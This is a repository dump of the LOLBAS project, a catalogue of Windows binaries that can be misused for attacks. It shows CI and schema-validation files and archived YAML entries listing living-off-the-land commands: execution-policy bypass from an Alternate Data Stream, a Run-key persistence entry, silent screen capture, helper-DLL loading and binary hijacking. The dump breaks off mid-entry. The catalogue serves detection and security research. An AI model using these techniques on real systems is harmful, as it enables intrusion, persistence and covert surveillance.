Repository: LOLBAS-Project/LOLBAS
Branch: master
Commit: db6da5b0308b
Files: 401
Total size: 594.4 KB

Directory structure:
gitextract_55_rj3ap/
├── .gitattributes
├── .github/
│   ├── .yamllint
│   ├── CODEOWNERS
│   ├── workflows/
│   │   ├── gh-pages.yml
│   │   ├── validation.py
│   │   └── yaml-linting.yml
│   └── yaml-lint-reviewdog.yml.bak
├── Archive-Old-Version/
│   ├── LOLUtilz/
│   │   ├── OSBinaries/
│   │   │   ├── Explorer.yml
│   │   │   ├── Netsh.yml
│   │   │   ├── Nltest.yml
│   │   │   ├── Openwith.yml
│   │   │   ├── Powershell.yml
│   │   │   ├── Psr.yml
│   │   │   └── Robocopy.yml
│   │   ├── OtherBinaries/
│   │   │   ├── AcroRd32.yml
│   │   │   ├── Gpup.yml
│   │   │   ├── Nlnotes.yml
│   │   │   ├── Notes.yml
│   │   │   ├── Nvudisp.yml
│   │   │   ├── Nvuhda6.yml
│   │   │   ├── ROCCAT_Swarm.yml
│   │   │   ├── RunCmd_X64.yml
│   │   │   ├── Setup.yml
│   │   │   ├── Upload.yml
│   │   │   ├── Usbinst.yml
│   │   │   ├── VBoxDrvInst.yml
│   │   │   └── aswrundll.yml
│   │   ├── OtherMSBinaries/
│   │   │   └── Winword.yml
│   │   └── OtherScripts/
│   │       └── Testxlst.yml
│   ├── OSBinaries/
│   │   ├── Atbroker.exe.md
│   │   ├── Bash.exe.md
│   │   ├── Bitsadmin.exe.md
│   │   ├── Certutil.exe.md
│   │   ├── Cmdkey.exe.md
│   │   ├── Cmstp.exe.md
│   │   ├── Control.exe.md
│   │   ├── Csc.exe.md
│   │   ├── Cscript.exe.md
│   │   ├── Dfsvc.exe.md
│   │   ├── Diskshadow.exe.md
│   │   ├── Dnscmd.exe.md
│   │   ├── Esentutl.exe.md
│   │   ├── Expand.exe.md
│   │   ├── Explorer.exe.md
│   │   ├── Extexport.exe.md
│   │   ├── Extrac32.exe.md
│   │   ├── Findstr.exe.md
│   │   ├── Forfiles.exe.md
│   │   ├── Gpscript.exe.md
│   │   ├── IEExec.exe.md
│   │   ├── Ie4unit.exe.md
│   │   ├── InfDefaultInstall.exe.md
│   │   ├── InstallUtil.exe.md
│   │   ├── Makecab.exe.md
│   │   ├── Mavinject.exe.md
│   │   ├── Microsoft.Wrokflow.Compiler.xml
│   │   ├── Microsoft.Wrokflow.Compiler.xoml
│   │   ├── Msbuild.exe.md
│   │   ├── Msconfig.exe.md
│   │   ├── Msdt.exe.md
│   │   ├── Msiexec.exe.md
│   │   ├── Netsh.exe.md
│   │   ├── Nltest.exe.md
│   │   ├── Openwith.exe.md
│   │   ├── Payload/
│   │   │   ├── Cmstp.inf
│   │   │   ├── Cmstp_calc.sct
│   │   │   ├── Evil.xbap
│   │   │   ├── Infdefaultinstall.inf
│   │   │   ├── Infdefaultinstall_calc.sct
│   │   │   ├── Msbuild.csproj
│   │   │   ├── Mshta_calc.sct
│   │   │   ├── PCW8E57.xml
│   │   │   ├── Regsvr32_calc.sct
│   │   │   ├── Wmic_calc.xsl
│   │   │   ├── file.rsp
│   │   │   └── mscfgtlc.xml
│   │   ├── Pcalua.exe.md
│   │   ├── Pcwrun.exe.md
│   │   ├── Powershell.exe.md
│   │   ├── PresentationHost.exe.md
│   │   ├── Print.exe.md
│   │   ├── Psr.exe.md
│   │   ├── Regasm.exe.md
│   │   ├── Register-cimprovider.exe.md
│   │   ├── Regsvcs.exe.md
│   │   ├── Regsvr32.exe.md
│   │   ├── Replace.exe.md
│   │   ├── Robocopy.exe.md
│   │   ├── Rpcping.exe.md
│   │   ├── Rundll32.exe.md
│   │   ├── Runonce.exe.md
│   │   ├── Runscripthelper.exe.md
│   │   ├── SC.exe.md
│   │   ├── Scriptrunner.exe.md
│   │   ├── SyncAppvPublishingServer.exe.md
│   │   ├── WMIC.exe.md
│   │   ├── Wab.exe.md
│   │   ├── Wscript.exe.md
│   │   ├── Xwizard.exe.md
│   │   ├── hh.exe.md
│   │   ├── mshta.exe.md
│   │   ├── odbcconf.exe.md
│   │   ├── reg.exe.md
│   │   └── regedit.exe.md
│   ├── OSLibraries/
│   │   ├── Advpack.dll.md
│   │   ├── Ieadvpack.dll.md
│   │   ├── Ieframe.dll.md
│   │   ├── Mshtml.dll.md
│   │   ├── Payload/
│   │   │   ├── Advpack.inf
│   │   │   ├── Advpack_calc.sct
│   │   │   ├── Ieadvpack.inf
│   │   │   └── Ieadvpack_calc.sct
│   │   ├── Pcwutl.dll.md
│   │   ├── Setupapi.dll.md
│   │   ├── Shdocvw.dll.md
│   │   ├── Shell32.dll.md
│   │   ├── Syssetup.dll.md
│   │   ├── Url.dll.md
│   │   └── Zipfldr.dll.md
│   ├── OSScripts/
│   │   ├── CL_Invocation.ps1.md
│   │   ├── CL_Mutexverifiers.ps1.md
│   │   ├── Manage-bde.wsf.md
│   │   ├── Payload/
│   │   │   ├── Pubprn_calc.sct
│   │   │   ├── Slmgr.reg
│   │   │   └── Slmgr_calc.sct
│   │   ├── Pubprn.vbs.md
│   │   ├── Slmgr.vbs.md
│   │   ├── SyncAppvPublishingServer.vbs.md
│   │   ├── Winrm.vbs.md
│   │   └── pester.bat.md
│   ├── OtherBinaries/
│   │   ├── AcroRd32.exe.md
│   │   ├── Gpup.exe.md
│   │   ├── Nlnotes.exe.md
│   │   ├── Notes.exe.md
│   │   ├── Nvudisp.exe.md
│   │   ├── Nvuhda6.exe.md
│   │   ├── ROCCAT_Swarm.exe.md
│   │   ├── Setup.exe.md
│   │   ├── Usbinst.exe.md
│   │   └── VBoxDrvInst.exe.md
│   ├── OtherMSBinaries/
│   │   ├── Appvlp.exe.md
│   │   ├── Bginfo.exe.md
│   │   ├── Cdb.exe.md
│   │   ├── Dxcap.exe.md
│   │   ├── Mftrace.exe.md
│   │   ├── Msdeploy.exe.md
│   │   ├── Payload/
│   │   │   └── Cdb_calc.wds
│   │   ├── SQLToolsPS.exe.md
│   │   ├── Sqldumper.exe.md
│   │   ├── Sqlps.exe.md
│   │   ├── Tracker.exe.md
│   │   ├── csi.exe.md
│   │   ├── dnx.exe.md
│   │   ├── msxsl.exe.md
│   │   ├── rcsi.exe.md
│   │   ├── te.exe.md
│   │   ├── vsjitdebugger.exe.md
│   │   └── winword.exe.md
│   └── OtherScripts/
│       └── testxlst.js.md
├── Backlog.txt
├── CONTRIBUTING.md
├── CategoryList.md
├── LICENSE
├── NOTICE.md
├── README.md
├── YML-Template.yml
└── yml/
    ├── HonorableMentions/
    │   ├── Code.yml
    │   ├── GfxDownloadWrapper.yml
    │   └── PowerShell.yml
    ├── OSBinaries/
    │   ├── Addinutil.yml
    │   ├── AppInstaller.yml
    │   ├── Aspnet_Compiler.yml
    │   ├── At.yml
    │   ├── Atbroker.yml
    │   ├── Bash.yml
    │   ├── Bitsadmin.yml
    │   ├── Certoc.yml
    │   ├── Certreq.yml
    │   ├── Certutil.yml
    │   ├── Change.yml
    │   ├── Cipher.yml
    │   ├── Cmd.yml
    │   ├── Cmdkey.yml
    │   ├── Cmdl32.yml
    │   ├── Cmstp.yml
    │   ├── Colorcpl.yml
    │   ├── ComputerDefaults.yml
    │   ├── ConfigSecurityPolicy.yml
    │   ├── Conhost.yml
    │   ├── Control.yml
    │   ├── Csc.yml
    │   ├── Cscript.yml
    │   ├── CustomShellHost.yml
    │   ├── DataSvcUtil.yml
    │   ├── Desktopimgdownldr.yml
    │   ├── DeviceCredentialDeployment.yml
    │   ├── Dfsvc.yml
    │   ├── Diantz.yml
    │   ├── Diskshadow.yml
    │   ├── Dnscmd.yml
    │   ├── Esentutl.yml
    │   ├── Eudcedit.yml
    │   ├── Eventvwr.yml
    │   ├── Expand.yml
    │   ├── Explorer.yml
    │   ├── Extexport.yml
    │   ├── Extrac32.yml
    │   ├── Findstr.yml
    │   ├── Finger.yml
    │   ├── FltMC.yml
    │   ├── Forfiles.yml
    │   ├── Fsutil.yml
    │   ├── Ftp.yml
    │   ├── Gpscript.yml
    │   ├── Hh.yml
    │   ├── IMEWDBLD.yml
    │   ├── Ie4uinit.yml
    │   ├── Iediagcmd.yml
    │   ├── Ieexec.yml
    │   ├── Ilasm.yml
    │   ├── Infdefaultinstall.yml
    │   ├── Installutil.yml
    │   ├── Iscsicpl.yml
    │   ├── Jsc.yml
    │   ├── Ldifde.yml
    │   ├── Makecab.yml
    │   ├── Mavinject.yml
    │   ├── Microsoft.Workflow.Compiler.yml
    │   ├── Mmc.yml
    │   ├── MpCmdRun.yml
    │   ├── Msbuild.yml
    │   ├── Msconfig.yml
    │   ├── Msdt.yml
    │   ├── Msedge.yml
    │   ├── Mshta.yml
    │   ├── Msiexec.yml
    │   ├── Netsh.yml
    │   ├── Ngen.yml
    │   ├── Odbcconf.yml
    │   ├── OfflineScannerShell.yml
    │   ├── OneDriveStandaloneUpdater.yml
    │   ├── Pcalua.yml
    │   ├── Pcwrun.yml
    │   ├── Pktmon.yml
    │   ├── Pnputil.yml
    │   ├── Presentationhost.yml
    │   ├── Print.yml
    │   ├── PrintBrm.yml
    │   ├── Provlaunch.yml
    │   ├── Psr.yml
    │   ├── Query.yml
    │   ├── Rasautou.yml
    │   ├── Rdrleakdiag.yml
    │   ├── Reg.yml
    │   ├── Regasm.yml
    │   ├── Regedit.yml
    │   ├── Regini.yml
    │   ├── Register-cimprovider.yml
    │   ├── Regsvcs.yml
    │   ├── Regsvr32.yml
    │   ├── Replace.yml
    │   ├── Reset.yml
    │   ├── Rpcping.yml
    │   ├── Rundll32.yml
    │   ├── Runexehelper.yml
    │   ├── Runonce.yml
    │   ├── Runscripthelper.yml
    │   ├── Sc.yml
    │   ├── Schtasks.yml
    │   ├── Scriptrunner.yml
    │   ├── Setres.yml
    │   ├── SettingSyncHost.yml
    │   ├── Sftp.yml
    │   ├── Sigverif.yml
    │   ├── Ssh.yml
    │   ├── Stordiag.yml
    │   ├── Syncappvpublishingserver.yml
    │   ├── Tar.yml
    │   ├── Ttdinject.yml
    │   ├── Tttracer.yml
    │   ├── Unregmp2.yml
    │   ├── Vbc.yml
    │   ├── Verclsid.yml
    │   ├── Wab.yml
    │   ├── Wbadmin.yml
    │   ├── Wbemtest.yml
    │   ├── Winget.yml
    │   ├── Wlrmdr.yml
    │   ├── Wmic.yml
    │   ├── WorkFolders.yml
    │   ├── Wscript.yml
    │   ├── Wsreset.yml
    │   ├── Wuauclt.yml
    │   ├── Xwizard.yml
    │   ├── msedge_proxy.yml
    │   ├── msedgewebview2.yml
    │   ├── odbcad32.yml
    │   ├── write.yml
    │   └── wt.yml
    ├── OSLibraries/
    │   ├── Advpack.yml
    │   ├── Desk.yml
    │   ├── Dfshim.yml
    │   ├── Ieadvpack.yml
    │   ├── Ieframe.yml
    │   ├── Mshtml.yml
    │   ├── Pcwutl.yml
    │   ├── PhotoViewer.yml
    │   ├── Scrobj.yml
    │   ├── Setupapi.yml
    │   ├── Shdocvw.yml
    │   ├── Shell32.yml
    │   ├── Shimgvw.yml
    │   ├── Syssetup.yml
    │   ├── Url.yml
    │   ├── Zipfldr.yml
    │   └── comsvcs.yml
    ├── OSScripts/
    │   ├── CL_LoadAssembly.yml
    │   ├── CL_mutexverifiers.yml
    │   ├── Cl_invocation.yml
    │   ├── Launch-VsDevShell.yml
    │   ├── Manage-bde.yml
    │   ├── Pubprn.yml
    │   ├── Syncappvpublishingserver.yml
    │   ├── UtilityFunctions.yml
    │   ├── Winrm.yml
    │   └── pester.yml
    └── OtherMSBinaries/
        ├── AccCheckConsole.yml
        ├── Adplus.yml
        ├── Agentexecutor.yml
        ├── AppLauncher.yml
        ├── Appcert.yml
        ├── Appvlp.yml
        ├── Bcp.yml
        ├── Bginfo.yml
        ├── Cdb.yml
        ├── Coregen.yml
        ├── Createdump.yml
        ├── Csi.yml
        ├── DefaultPack.yml
        ├── Devinit.yml
        ├── Devtoolslauncher.yml
        ├── Dnx.yml
        ├── Dotnet.yml
        ├── Dsdbutil.yml
        ├── Dtutil.yml
        ├── Dump64.yml
        ├── DumpMinitool.yml
        ├── Dxcap.yml
        ├── ECMangen.yml
        ├── Excel.yml
        ├── Fsi.yml
        ├── FsiAnyCpu.yml
IntelliTrace.yml ├── Logger.yml ├── Mftrace.yml ├── Microsoft.NodejsTools.PressAnyKey.yml ├── Mpiexec.yml ├── Msaccess.yml ├── Msdeploy.yml ├── MsoHtmEd.yml ├── Mspub.yml ├── Msxsl.yml ├── Nmcap.yml ├── Ntdsutil.yml ├── Ntsd.yml ├── OpenConsole.yml ├── Pixtool.yml ├── Powerpnt.yml ├── Procdump.yml ├── ProtocolHandler.yml ├── Rcsi.yml ├── Remote.yml ├── Sqldumper.yml ├── Sqlps.yml ├── Sqltoolsps.yml ├── Squirrel.yml ├── Te.yml ├── Teams.yml ├── Testwindowremoteagent.yml ├── Tracker.yml ├── Update.yml ├── VSDiagnostics.yml ├── VSIISExeLauncher.yml ├── Visio.yml ├── VisualUiaVerifyNative.yml ├── VsLaunchBrowser.yml ├── Vshadow.yml ├── Vsjitdebugger.yml ├── WFMFormat.yml ├── Wfc.yml ├── WinDbg.yml ├── Winproj.yml ├── Winword.yml ├── Wsl.yml ├── XBootMgr.yml ├── XBootMgrSleep.yml ├── devtunnels.yml ├── vsls-agent.yml ├── vstest.console.yml ├── winfile.yml └── xsd.yml ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitattributes ================================================ *.yml text eol=lf ================================================ FILE: .github/.yamllint ================================================ --- extends: default yaml-files: - '*.yml' rules: new-line-at-end-of-file: level: error trailing-spaces: level: error line-length: max: 1000 level: warning new-lines: level: error indentation: level: error document-start: present: true level: error ================================================ FILE: .github/CODEOWNERS ================================================ * @LOLBAS-Project/lolbas-team ================================================ FILE: .github/workflows/gh-pages.yml ================================================ --- name: Update LOLBAS-Project.github.io on: workflow_run: workflows: ["PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks"] types: [completed] branches: [master] jobs: build: runs-on: ubuntu-latest if: 
${{ github.event.repository.fork == false && github.event.workflow_run.conclusion == 'success' }} steps: - uses: actions/checkout@v2 - name: Change .yml to .md run: | for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done mv yml/OSBinaries yml/Binaries mv yml/OSLibraries yml/Libraries mv yml/OSScripts yml/Scripts rm -r yml/HonorableMentions - name: Deploy to LOLBAS-Project.github.io repo uses: peaceiris/actions-gh-pages@v3 with: deploy_key: ${{ secrets.ACTIONS_DEPLOY_KEY }} external_repository: LOLBAS-Project/LOLBAS-Project.github.io publish_branch: master publish_dir: yml destination_dir: _lolbas enable_jekyll: true keep_files: false commit_message: "Applying update " user_name: 'github-actions[bot]' user_email: 'github-actions[bot]@users.noreply.github.com' ================================================ FILE: .github/workflows/validation.py ================================================ import glob import os import sys from typing import List, Literal, Optional import yaml from pydantic import BaseModel, HttpUrl, RootModel, ValidationError, constr, model_validator, field_validator, ConfigDict # Disable datetime parsing yaml.SafeLoader.yaml_implicit_resolvers = {k: [r for r in v if r[0] != 'tag:yaml.org,2002:timestamp'] for k, v in yaml.SafeLoader.yaml_implicit_resolvers.items()} safe_str = constr(pattern=r'^([a-zA-Z0-9\s.,!?\'"():;\-\+_*#@/\\&%~=]|`[a-zA-Z0-9\s.,!?\'"():;\-\+_*#@/\\&<>%\{\}~=]+`|->)+$') class LolbasModel(BaseModel): model_config = ConfigDict(extra="forbid") class AliasItem(LolbasModel): Alias: Optional[str] class TagItem(RootModel[dict[constr(pattern=r'^[A-Z]'), str]]): pass class CommandItem(LolbasModel): Command: str Description: safe_str Usecase: safe_str Category: Literal['ADS', 'AWL Bypass', 'Compile', 'Conceal', 'Copy', 'Credentials', 'Decode', 'Download', 'Dump', 'Encode', 'Execute', 'Reconnaissance', 'Tamper', 'UAC Bypass', 'Upload'] Privileges: str MitreID: 
constr(pattern=r'^T[0-9]{4}(\.[0-9]{3})?$') OperatingSystem: str Tags: Optional[List[TagItem]] = None class FullPathItem(LolbasModel): Path: constr(pattern=r'^(([cC]:)\\([a-zA-Z0-9\-\_\. \(\)<>]+\\)*([a-zA-Z0-9_\-\.]+\.[a-z0-9]{3})|no default)$') class CodeSampleItem(LolbasModel): Code: str class DetectionItem(LolbasModel): IOC: Optional[str] = None Sigma: Optional[HttpUrl] = None Analysis: Optional[HttpUrl] = None Elastic: Optional[HttpUrl] = None Splunk: Optional[HttpUrl] = None BlockRule: Optional[HttpUrl] = None @model_validator(mode="after") def validate_exclusive_urls(cls, values): url_fields = ['IOC', 'Sigma', 'Analysis', 'Elastic', 'Splunk', 'BlockRule'] present = [field for field in url_fields if values.__dict__.get(field) is not None] if len(present) != 1: raise ValueError(f"Exactly one of the following must be provided: {url_fields}.", f"Currently set: {present or 'none'}") return values class ResourceItem(LolbasModel): Link: HttpUrl class AcknowledgementItem(LolbasModel): Person: str Handle: Optional[constr(pattern=r'^(@(\w){1,15})?$')] = None class MainModel(LolbasModel): Name: str Description: safe_str Aliases: Optional[List[AliasItem]] = None Author: str Created: constr(pattern=r'\d{4}-\d{2}-\d{2}') Commands: List[CommandItem] Full_Path: List[FullPathItem] Code_Sample: Optional[List[CodeSampleItem]] = None Detection: Optional[List[DetectionItem]] = None Resources: Optional[List[ResourceItem]] = None Acknowledgement: Optional[List[AcknowledgementItem]] = None if __name__ == "__main__": def escaper(x): return x.replace('%', '%25').replace('\r', '%0D').replace('\n', '%0A') yaml_files = glob.glob("yml/**", recursive=True) if not yaml_files: print("No YAML files found under 'yml/**'.") sys.exit(-1) has_errors = False for file_path in yaml_files: if os.path.isfile(file_path) and not file_path.startswith('yml/HonorableMentions/'): try: with open(file_path, 'r', encoding='utf-8') as f: data = yaml.safe_load(f) MainModel(**data) print(f"✅ Valid: {file_path}") 
except ValidationError as ve: print(f"❌ Validation error in {file_path}:\n{ve}\n") for err in ve.errors(): # GitHub Actions error format print(err) path = '.'.join([str(x) for x in err.get('loc', [None])]) msg = err.get('msg', 'Unknown validation error') print(f"::error file={file_path},line=1,title={escaper(err.get('type') or 'Validation error')}::{escaper(msg)}: {escaper(path)}") has_errors = True except Exception as e: print(f"⚠️ Error processing {file_path}: {e}\n") print(f"::error file={file_path},line=1,title=Processing error::Error processing file: {escaper(e)}") has_errors = True sys.exit(-1 if has_errors else 0) ================================================ FILE: .github/workflows/yaml-linting.yml ================================================ --- name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks on: [push,pull_request] jobs: lintFiles: if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.full_name != github.event.pull_request.base.repo.full_name runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - name: Check file extensions run: | files=$(find "$GITHUB_WORKSPACE/yml" -type f -not -name "*.yml"); if [[ $files ]]; then echo "::error::Files with unexpected extension found, please ensure you use '.yml' (all lower case) for files in the yml/ folder."; for i in $files; do echo "::error file=$i,line=1::Unexpected extension"; done exit 1; fi unset files - name: Check duplicate file names run: | files=$(find "$GITHUB_WORKSPACE/yml/OSBinaries" "$GITHUB_WORKSPACE/yml/OtherMSBinaries" -type f -printf '%h %f\n' -iname "*.yml" | sort -t ' ' -k 2,2 -f | uniq -i -f 1 --all-repeated=separate | tr ' ' '/') if [[ $files ]]; then echo "::error::Files with duplicate filenames detected, please make sure you don't create duplicate entries."; for i in $files; do echo "::error file=$i,line=1::Duplicate filename"; done exit 1; fi unset files - name: Install python dependencies run: pip install yamllint==1.37.1 
pydantic==2.11.9 - name: Lint YAML files run: yamllint -c .github/.yamllint yml/**/ - name: Validate YAML schemas run: python3 .github/workflows/validation.py ================================================ FILE: .github/yaml-lint-reviewdog.yml.bak ================================================ --- name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks on: [pull_request] jobs: lintFiles: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - name: Run yamllint uses: reviewdog/action-yamllint@v1 with: level: error reporter: github-pr-review # Change reporter. yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml' - name: Validate OSBinaries YAML Schema uses: cketti/action-pykwalify@v0.3-temp-fix with: files: yml/OSBinaries/*.yml schema: YML-Schema.yml - name: Validate OSLibraries YAML Schema uses: cketti/action-pykwalify@v0.3-temp-fix with: files: yml/OSLibraries/*.yml schema: YML-Schema.yml - name: Validate OSScripts YAML Schema uses: cketti/action-pykwalify@v0.3-temp-fix with: files: yml/OSScripts/*.yml schema: YML-Schema.yml - name: Validate OtherMSBinaries YAML Schema uses: cketti/action-pykwalify@v0.3-temp-fix with: files: yml/OtherMSBinaries/*.yml schema: YML-Schema.yml ================================================ FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Explorer.yml ================================================ --- Name: Explorer.exe Description: Execute Author: '' Created: '2018-05-25' Categories: [] Commands: - Command: explorer.exe calc.exe Description: 'Executes calc.exe as a subprocess of explorer.exe.' 
Full_Path: - c:\windows\explorer.exe - c:\windows\sysWOW64\explorer.exe Code_Sample: [] Detection: [] Resources: - https://twitter.com/bohops/status/986984122563391488 Acknowledgement: - Person: Jimmy Handle: '@bohops' ================================================ FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Netsh.yml ================================================ --- Name: Netsh.exe Description: Execute, Surveillance Author: '' Created: '2018-05-25' Categories: [] Commands: - Command: | netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!() netsh.exe trace show status Description: Capture network traffic on remote file share. - Command: netsh.exe add helper C:\Path\file.dll Description: Load (execute) NetSh.exe helper DLL file. - Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 Description: Forward traffic from the listening address and proxy to a remote system. 
Full_Path: - C:\Windows\System32 - C:\Windows\SysWOW64 Code_Sample: [] Detection: [] Resources: - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md - https://attack.mitre.org/wiki/Technique/T1128 - https://twitter.com/teemuluotio/status/990532938952527873 Acknowledgement: - Person: '' - Handle: '' ================================================ FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Nltest.yml ================================================ --- Name: Nltest.exe Description: Credentials Author: '' Created: 2018-05-25 Commands: - Command: nltest.exe /SERVER:192.168.1.10 /QUERY Description: '' Full_Path: - c:\windows\system32\nltest.exe Code_Sample: [] Detection: [] Resources: - https://twitter.com/sysopfb/status/986799053668139009 - https://ss64.com/nt/nltest.html Acknowledgement: - Person: Sysopfb Handle: '@sysopfb' ================================================ FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Openwith.yml ================================================ --- Name: Openwith.exe Description: Execute Author: '' Created: '2018-05-25' Commands: - Command: OpenWith.exe /c C:\test.hta Description: Opens the target file with the default application. - Command: OpenWith.exe /c C:\testing.msi Description: Opens the target file with the default application. Full_Path: - c:\windows\system32\Openwith.exe - c:\windows\sysWOW64\Openwith.exe Code_Sample: [] Detection: [] Resources: - https://twitter.com/harr0ey/status/991670870384021504 Acknowledgement: - Person: Matt harr0ey Handle: '@harr0ey' ================================================ FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Powershell.yml ================================================ --- Name: Powershell.exe Description: Execute, Read ADS Author: '' Created: '2018-05-25' Commands: - Command: powershell -ep bypass - < c:\temp:ttt Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS). 
Full_Path: - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code_Sample: [] Detection: [] Resources: - https://twitter.com/Moriarty_Meng/status/984380793383370752 Acknowledgement: - Person: Moriarty Handle: '@Moriarty_Meng' ================================================ FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Psr.yml ================================================ --- Name: Psr.exe Description: Surveillance Author: '' Created: '2018-05-25' Categories: [] Commands: - Command: psr.exe /start /gui 0 /output c:\users\user\out.zip Description: Capture screenshots of the desktop and save them in the target .ZIP file. - Command: psr.exe /start /maxsc 100 /gui 0 /output c:\users\user\out.zip Description: Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file. - Command: psr.exe /stop Description: Stop the Problem Step Recorder. Full_Path: - C:\Windows\System32\Psr.exe - C:\Windows\SysWOW64\Psr.exe Code_Sample: [] Detection: [] Resources: - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf Acknowledgement: - Person: '' - Handle: '' ================================================ FILE: Archive-Old-Version/LOLUtilz/OSBinaries/Robocopy.yml ================================================ --- Name: Robocopy.exe Description: Copy Author: '' Created: 2018-05-25 Categories: [] Commands: - Command: Robocopy.exe C:\SourceFolder C:\DestFolder Description: Copy the entire contents of the SourceFolder to the DestFolder. - Command: Robocopy.exe \\SERVER\SourceFolder C:\DestFolder Description: Copy the entire contents of the SourceFolder to the DestFolder. 
Full_Path: - c:\windows\system32\binary.exe - c:\windows\sysWOW64\binary.exe Code_Sample: [] Detection: [] Resources: - https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx Acknowledgement: - Person: '' - Handle: '' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/AcroRd32.yml ================================================ --- Name: AcroRd32.exe Description: Execute Author: '' Created: 2018-05-25 Commands: - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe Full_Path: - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/997997818362155008 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Gpup.yml ================================================ --- Name: Gpup.exe Description: Execute Author: '' Created: 2018-05-25 Commands: - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe Description: Execute another command through gpup.exe (Notepad++ binary). 
Full_Path: - 'C:\Program Files (x86)\Notepad++\updater\gpup.exe ' Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/997892519827558400 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Nlnotes.yml ================================================ --- Name: Nlnotes.exe Description: Execute Author: '' Created: 2018-05-25 Commands: - Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } Description: Run PowerShell via LotusNotes. Full_Path: - C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe Code_Sample: [] Detection: [] Resources: - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f - https://twitter.com/HanseSecure/status/995578436059127808 Acknowledgement: - Person: Daniel Bohannon Handle: '@danielhbohannon' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Notes.yml ================================================ --- Name: Notes.exe Description: Execute Author: '' Created: 2018-05-25 Commands: - Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } Description: Run PowerShell via LotusNotes. 
Full_Path: - C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe Code_Sample: [] Detection: [] Resources: - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f - https://twitter.com/HanseSecure/status/995578436059127808 Acknowledgement: - Person: Daniel Bohannon Handle: '@danielhbohannon' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml ================================================ --- Name: Nvudisp.exe Description: Execute, Copy, Add registry, Create shortcut, kill process Author: '' Created: 2018-05-25 Commands: - Command: Nvudisp.exe System calc.exe Description: Execute calc.exe as a subprocess. - Command: Nvudisp.exe Copy test.txt,test-2.txt Description: Copy fila A to file B. - Command: Nvudisp.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe Description: Add/Edit a Registry key value. - Command: Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\" Description: Create shortcut file. - Command: Nvudisp.exe KillApp calculator.exe Description: Kill a process. - Command: Nvudisp.exe Run foo Description: Run process Full_Path: - C:\windows\system32\nvuDisp.exe Code_Sample: [] Detection: [] Resources: - http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Nvuhda6.yml ================================================ --- Name: Nvuhda6.exe Description: Execute, Copy, Add registry, Create shortcut, kill process Author: '' Created: 2018-05-25 Commands: - Command: nvuhda6.exe System calc.exe Description: Execute calc.exe as a subprocess. - Command: nvuhda6.exe Copy test.txt,test-2.txt Description: Copy fila A to file B. 
- Command: nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe Description: Add/Edit a Registry key value - Command: nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\" Description: Create shortcut file. - Command: nvuhda6.exe KillApp calc.exe Description: Kill a process. - Command: nvuhda6.exe Run foo Description: Run process Full_Path: - Missing Code_Sample: [] Detection: [] Resources: - http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/ Acknowledgement: - Person: Adam Handle: '@hexacorn' ================================================ FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml ================================================ --- Name: ROCCAT_Swarm.exe Description: Execute Author: '' Created: 2018-05-25 Commands: - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe Description: Hijack 